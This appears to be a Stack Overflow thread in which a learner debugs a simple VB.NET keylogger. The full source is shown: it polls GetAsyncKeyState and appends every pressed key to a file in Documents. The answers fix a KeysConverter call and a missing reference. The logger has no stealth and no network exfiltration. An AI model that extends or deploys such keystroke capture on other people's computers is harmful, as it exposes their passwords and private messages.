# Unable to use KeysConverter in a keylogger program

Tags: vb.net, keylogger

I am trying to create a basic keylogging program. I am interested in cyber security and want to learn more. I have hashed together the code below from various sources.
The line text = converter.ToString(i) generates an index out of bounds error.
I am thinking that this is because the object converter has not been instantiated as it should?? But how to fix it?

```
Imports System.IO
Imports System.Text
Imports System.Windows.Forms
Imports System.Runtime.InteropServices
Imports System.Threading

Module Module1
     Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short
Sub Main()
    Dim filepath = Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments)
    filepath &= "\LogsFolder\"

    If (Not Directory.Exists(filepath)) Then
        Directory.CreateDirectory(filepath)
    End If

    Dim Path = (filepath & "LoggedKeys.text")

    If Not File.Exists(Path) Then
        Using sw As StreamWriter = File.CreateText(Path)
        End Using
    End If

    Dim Converter = New KeysConverter()
    Dim text As String = ""

    While (True)
        Thread.Sleep(5)
        For i As Integer = 0 To 1999
            Dim key = GetAsyncKeyState(i)
            If key = 1 Or key = -32767 Then
                text = converter.ToString(i)
                Using sw As StreamWriter = File.AppendText(Path)
                    sw.WriteLine(text)
                End Using
                Exit For
            End If
        Next
    End While

End Sub

End Module
```

Comment: Pretty sure it should be `Dim converter as New KeysConverter()`. I think when you use the `= New` syntax no type is defined for the variable so it becomes Object type.

Comment: @RBarryYoung No, they actually work the same AFAIK. `Dim foo = New Bar()` is similar to `var foo = new Bar();` in C#, while `Dim foo As New Bar()` is a shorthand for `Dim foo As Bar = New Bar()` which is equivalent to `Bar foo = new Bar();` in C#.

Comment: Looks like [it used to be that way in earlier versions of VB.NET](https://stackoverflow.com/a/848376/4934172) though.

Answer (score 3, accepted):

Looks like you're looking for the [`ConvertToString`](https://learn.microsoft.com/en-us/dotnet/api/system.componentmodel.typeconverter.converttostring) method.

Replace the following line:

```
text = converter.ToString(i)
```

With:

```
text = converter.ConvertToString(i)
```

---

**Edit to address your concerns in the comments:**

> I get a syntax error, 'ConvertToString' is not a member of KeysConverter... it sounds like my instantiation has not worked.

Hover with the mouse cursor over your `Converter` variable and double-check its type. Make sure that `KeysConverter` *actually is* the `System.Windows.Forms.KeysConverter` class and not some kind of a local generated class.

> MyImports System.Windows.Forms statement is ghosted - suggesting that its never used.

That's what I suspected. You seem to be in a Console application and you're accessing a class within the `System.Windows.Forms` namespace *which is **not** included in the Console app*. You need to add a reference to System.Windows.Forms.dll as explained in [this answer](https://stackoverflow.com/a/9646739/4934172).

Also, make sure you locate and delete the generated KeysConverter class from your project so you avoid conflicts.

Comment: Thanks for the answer. Unfortunately, that wont work. I get a syntax error, 'ConvertToString' is not a member of KeysConverter. This is whats troubling me - it sounds like my instantiation has not worked, hence I cant call the mehod

Comment: What do you mean your instantiation has not worked? Hover with the cursor over your `Converter` variable and double-check its type. Make sure that `KeysConverter` _actually is_ the `System.Windows.Forms.KeysConverter` class and not some kind of a local generated class.

Comment: Thanks for coming back to me. MyImports System.Windows.Forms statement is ghosted - suggesting that its never used. I'm guessing that's why I cant access the method ConvertToString - its just doesn't pop up when I type the full stop after the variable 'converter'.

Comment: Got it!!! You were right. Somehow, I managed to create a sneaky local class  - probably entered a period and then smacked enter without checking what it was doing.

Comment: @Rich, I've edited the answer to address your last concern about the System.Windows.Forms reference.

Comment: I really appreciate your help. Thank you so much. People like you really help people like me to learn